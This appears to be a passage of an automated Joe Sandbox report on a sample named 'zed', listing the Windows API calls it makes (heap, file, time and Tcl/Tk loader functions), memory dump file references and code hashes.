                                                                                                                                                                                                                                                • FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E5315839), ref: 00007FF7E5315957
                                                                                                                                                                                                                                                • SystemTimeToTzSpecificLocalTime.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E5315839), ref: 00007FF7E531596D
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.4732533580.00007FF7E5301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E5300000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4732256392.00007FF7E5300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4732804708.00007FF7E532B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733002679.00007FF7E533E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733002679.00007FF7E5342000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733288009.00007FF7E5344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_7ff7e5300000_zed.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Time$System$FileLocalSpecific
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1707611234-0
                                                                                                                                                                                                                                                • Opcode ID: 497c6f3b45805196ef8f930e068bad9451f3f50de380bc241881b145e929bf5b
                                                                                                                                                                                                                                                • Instruction ID: a1d57af82fb28c4e5659527a1bae3b32d81f7e5498fae5e17fbcf7052cdc1d6d
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 497c6f3b45805196ef8f930e068bad9451f3f50de380bc241881b145e929bf5b
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1711B22161C60682EA106B15A52023AF760EB94B75F90033BF69EC19D8EF3CD414DF22
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • RtlFreeHeap.NTDLL(?,?,?,00007FF7E5322D22,?,?,?,00007FF7E5322D5F,?,?,00000000,00007FF7E5323225,?,?,?,00007FF7E5323157), ref: 00007FF7E531A95E
                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,00007FF7E5322D22,?,?,?,00007FF7E5322D5F,?,?,00000000,00007FF7E5323225,?,?,?,00007FF7E5323157), ref: 00007FF7E531A968
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.4732533580.00007FF7E5301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E5300000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4732256392.00007FF7E5300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4732804708.00007FF7E532B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733002679.00007FF7E533E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733002679.00007FF7E5342000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733288009.00007FF7E5344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_7ff7e5300000_zed.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ErrorFreeHeapLast
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 485612231-0
                                                                                                                                                                                                                                                • Opcode ID: 46e6024f15a2f57ad5ff64688e0fe3cec5898f8577aba2f63b046adc8766ef53
                                                                                                                                                                                                                                                • Instruction ID: 25e570d6e23171dc4400e6a1067a65ef7e5a4958b7af63811f85088664bfdeec
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 46e6024f15a2f57ad5ff64688e0fe3cec5898f8577aba2f63b046adc8766ef53
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AAE04F54E2960E43FE057BF1987533892515FA4F49FC4403AC90DC32A1EE3C68818632
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • CloseHandle.KERNELBASE(?,?,?,00007FF7E531A9D5,?,?,00000000,00007FF7E531AA8A), ref: 00007FF7E531ABC6
                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,00007FF7E531A9D5,?,?,00000000,00007FF7E531AA8A), ref: 00007FF7E531ABD0
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.4732533580.00007FF7E5301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E5300000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4732256392.00007FF7E5300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4732804708.00007FF7E532B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733002679.00007FF7E533E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733002679.00007FF7E5342000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733288009.00007FF7E5344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_7ff7e5300000_zed.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CloseErrorHandleLast
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 918212764-0
                                                                                                                                                                                                                                                • Opcode ID: ae1e15d82824e1a5fac1c7302ca2ff5641fe0b0e43db7728cd9339717749910c
                                                                                                                                                                                                                                                • Instruction ID: ec05e5ee9cb54cdc71de1cfa815594c29171f6d88760569462d146d2067f2fac
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ae1e15d82824e1a5fac1c7302ca2ff5641fe0b0e43db7728cd9339717749910c
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E221A711B2868A41EA6077B1977037DD2829FA4F99F88827FD91EC77D1CE7CA4414362
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.4732533580.00007FF7E5301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E5300000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4732256392.00007FF7E5300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4732804708.00007FF7E532B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733002679.00007FF7E533E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733002679.00007FF7E5342000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733288009.00007FF7E5344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_7ff7e5300000_zed.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3215553584-0
                                                                                                                                                                                                                                                • Opcode ID: 5a303e376ae32d58fd1e52f1ac99a64fdc1cf63549abbe0bdd4da132c2ec767e
                                                                                                                                                                                                                                                • Instruction ID: c6ff9cbdbae28acd143fa806b37360c0b1fb4222420568a2522fea206aacaa91
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5a303e376ae32d58fd1e52f1ac99a64fdc1cf63549abbe0bdd4da132c2ec767e
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B041BB3252424947E634AA35A670379F361EB65F99F50013AD68EC36D1CF3CE402C772
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.4732533580.00007FF7E5301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E5300000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4732256392.00007FF7E5300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4732804708.00007FF7E532B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733002679.00007FF7E533E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733002679.00007FF7E5342000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733288009.00007FF7E5344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_7ff7e5300000_zed.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: _fread_nolock
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 840049012-0
                                                                                                                                                                                                                                                • Opcode ID: 7026eb3b68f3585a2f5768ea15c5ca7bda34a28a3ae4cdbb6486ed2f903c9d01
                                                                                                                                                                                                                                                • Instruction ID: ce86ffb16569b98a40abe9bbae5e00327a3213fbde533038fed0d3fa6b5d5ec7
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7026eb3b68f3585a2f5768ea15c5ca7bda34a28a3ae4cdbb6486ed2f903c9d01
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B421A711B2875956EA10BA2269243FBD641BF55FDCFC84436EE4C87B86CEBDE046C311
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.4732533580.00007FF7E5301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E5300000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4732256392.00007FF7E5300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4732804708.00007FF7E532B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733002679.00007FF7E533E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733002679.00007FF7E5342000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733288009.00007FF7E5344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_7ff7e5300000_zed.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3215553584-0
                                                                                                                                                                                                                                                • Opcode ID: 0fe3e981c7cf3185d146a9a4244026f2f164e791e6f92d2a50fd94940550a020
                                                                                                                                                                                                                                                • Instruction ID: 8afec2adbc557e99ad1d0da1133e58b32f5c1fcbf203c02e6b0aec121e2600b6
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0fe3e981c7cf3185d146a9a4244026f2f164e791e6f92d2a50fd94940550a020
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 45316222A3861A85F7117B75896137CA690AFA0F98FC1013FE91D973D2CE7CA4428737
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.4732533580.00007FF7E5301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E5300000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4732256392.00007FF7E5300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4732804708.00007FF7E532B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733002679.00007FF7E533E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733002679.00007FF7E5342000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733288009.00007FF7E5344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_7ff7e5300000_zed.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3215553584-0
                                                                                                                                                                                                                                                • Opcode ID: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
                                                                                                                                                                                                                                                • Instruction ID: e20db2a35c1e621e04754bdf717e11438ae703104635f4e99c17e5eafb68a8f0
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 48118721A3C64981EA60BF21962037DE260AFA5F88FC4453BEA4CD7B95CF3CD4104B72
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.4732533580.00007FF7E5301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E5300000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4732256392.00007FF7E5300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4732804708.00007FF7E532B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733002679.00007FF7E533E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733002679.00007FF7E5342000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733288009.00007FF7E5344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_7ff7e5300000_zed.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3215553584-0
                                                                                                                                                                                                                                                • Opcode ID: 3765a10cee1e255344ee37f065f4be71d58868c9c9e645b3056c9746d3493235
                                                                                                                                                                                                                                                • Instruction ID: b31782588a78960d63aea4aec26b8979174349217b193049277e821e64304c07
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3765a10cee1e255344ee37f065f4be71d58868c9c9e645b3056c9746d3493235
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 37212532628E4586DB60AF28D450379B2A0FFA0F58FA40239EB5EC76D9DF3CD4108B11
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.4732533580.00007FF7E5301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E5300000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4732256392.00007FF7E5300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4732804708.00007FF7E532B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733002679.00007FF7E533E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733002679.00007FF7E5342000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733288009.00007FF7E5344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_7ff7e5300000_zed.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3215553584-0
                                                                                                                                                                                                                                                • Opcode ID: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
                                                                                                                                                                                                                                                • Instruction ID: 4548216baf2ac5461c3dc325094656b5d1f8fa6e63ba97e93b064a23d7b0f254
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 43010C21A2474941E500FF739A10269E691BFA1FE4F884236DE5C977D6CE3CE0118711
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • HeapAlloc.KERNEL32(?,?,00000000,00007FF7E531B32A,?,?,?,00007FF7E5314F11,?,?,?,?,00007FF7E531A48A), ref: 00007FF7E531EBED
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.4732533580.00007FF7E5301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E5300000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4732256392.00007FF7E5300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4732804708.00007FF7E532B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733002679.00007FF7E533E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733002679.00007FF7E5342000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733288009.00007FF7E5344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_7ff7e5300000_zed.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: AllocHeap
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 4292702814-0
                                                                                                                                                                                                                                                • Opcode ID: 0190c006dd090f1dc8136ef035d08a675b61e1fdbed98732a32380f018d60316
                                                                                                                                                                                                                                                • Instruction ID: 48e1d4ca70e3dd3a1992fa4543b17ef4127cb90a2afca6471125982be2e72a9d
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0190c006dd090f1dc8136ef035d08a675b61e1fdbed98732a32380f018d60316
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0DF08718B2D60A41FE5876B58B303B496805FA8F88F8C813BC90FC62C1EE3DA4845232
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • HeapAlloc.KERNEL32(?,?,?,00007FF7E5310C90,?,?,?,00007FF7E53122FA,?,?,?,?,?,00007FF7E5313AE9), ref: 00007FF7E531D63A
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.4732533580.00007FF7E5301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E5300000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4732256392.00007FF7E5300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4732804708.00007FF7E532B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733002679.00007FF7E533E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733002679.00007FF7E5342000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733288009.00007FF7E5344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_7ff7e5300000_zed.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: AllocHeap
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 4292702814-0
                                                                                                                                                                                                                                                • Opcode ID: 510c613edcbd96140e332c46b5608733b20d975e117422ad796dc4540c81bb80
                                                                                                                                                                                                                                                • Instruction ID: fe5b6940c6c5805f84a1452b7329e46203cd8e7d1013dd605dc1deabca3cb933
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 510c613edcbd96140e332c46b5608733b20d975e117422ad796dc4540c81bb80
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1DF05E10F2820E45FE5437715A31374D2904FA5FA9FC80B3ADD6EC62C1DE3CA4808132
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.4732533580.00007FF7E5301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E5300000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4732256392.00007FF7E5300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4732804708.00007FF7E532B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733002679.00007FF7E533E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733002679.00007FF7E5342000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733288009.00007FF7E5344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_7ff7e5300000_zed.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: AddressErrorLastProc
                                                                                                                                                                                                                                                • String ID: Failed to get address for %hs$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_JoinThread$Tcl_MutexFinalize$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
                                                                                                                                                                                                                                                • API String ID: 199729137-3427451314
                                                                                                                                                                                                                                                • Opcode ID: 939c8a0ebf27c7f5789cd4a10996167767bc86255d761b2ba34a42bc6fc861e3
                                                                                                                                                                                                                                                • Instruction ID: c34e49d2cf330e9d890611997dee9e8b057fec40025f53bc0f7526d5764e662e
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 939c8a0ebf27c7f5789cd4a10996167767bc86255d761b2ba34a42bc6fc861e3
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F802AA28929F0F90EA15BB55A834774A3A5AF24F4DBD4453FD41E86260EF3CB54A8333
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • FindFirstFileW.KERNEL32(?,00007FF7E5308919,00007FF7E5303FA5), ref: 00007FF7E530842B
                                                                                                                                                                                                                                                • RemoveDirectoryW.KERNEL32(?,00007FF7E5308919,00007FF7E5303FA5), ref: 00007FF7E53084AE
                                                                                                                                                                                                                                                • DeleteFileW.KERNEL32(?,00007FF7E5308919,00007FF7E5303FA5), ref: 00007FF7E53084CD
                                                                                                                                                                                                                                                • FindNextFileW.KERNEL32(?,00007FF7E5308919,00007FF7E5303FA5), ref: 00007FF7E53084DB
                                                                                                                                                                                                                                                • FindClose.KERNEL32(?,00007FF7E5308919,00007FF7E5303FA5), ref: 00007FF7E53084EC
                                                                                                                                                                                                                                                • RemoveDirectoryW.KERNEL32(?,00007FF7E5308919,00007FF7E5303FA5), ref: 00007FF7E53084F5
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.4732533580.00007FF7E5301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E5300000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4732256392.00007FF7E5300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4732804708.00007FF7E532B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733002679.00007FF7E533E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733002679.00007FF7E5342000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733288009.00007FF7E5344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_7ff7e5300000_zed.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: FileFind$DirectoryRemove$CloseDeleteFirstNext
                                                                                                                                                                                                                                                • String ID: %s\*
                                                                                                                                                                                                                                                • API String ID: 1057558799-766152087
                                                                                                                                                                                                                                                • Opcode ID: 9215641a051a597ab69d89bbe09b444c24fb25eba6eed844fe9e008ab190e420
                                                                                                                                                                                                                                                • Instruction ID: afc3df95b31beb30f50c54aa6c02c81c5233da211e4eab55967f02939865be9a
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9215641a051a597ab69d89bbe09b444c24fb25eba6eed844fe9e008ab190e420
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 59418721A2CB4A81EA60AF15E4643BAE360FB64F5CFC0023BE55DC2A84DF7CE5558712
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.4732533580.00007FF7E5301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E5300000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4732256392.00007FF7E5300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4732804708.00007FF7E532B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733002679.00007FF7E533E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733002679.00007FF7E5342000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733288009.00007FF7E5344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_7ff7e5300000_zed.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3140674995-0
                                                                                                                                                                                                                                                • Opcode ID: 357b26123f7cc0566be18cabbec560c6351d8abd4e8582c9dfa9d4018571b442
                                                                                                                                                                                                                                                • Instruction ID: 92a82a492cac0aa44280e3d34ca01df7583aef946ae5d4500441841d98025179
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 357b26123f7cc0566be18cabbec560c6351d8abd4e8582c9dfa9d4018571b442
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 05316276618F8586EB649F60E8603ED73A4FB94B0CF44443ADA4D87B94DF38D148C711
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.4732533580.00007FF7E5301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E5300000, based on PE: true
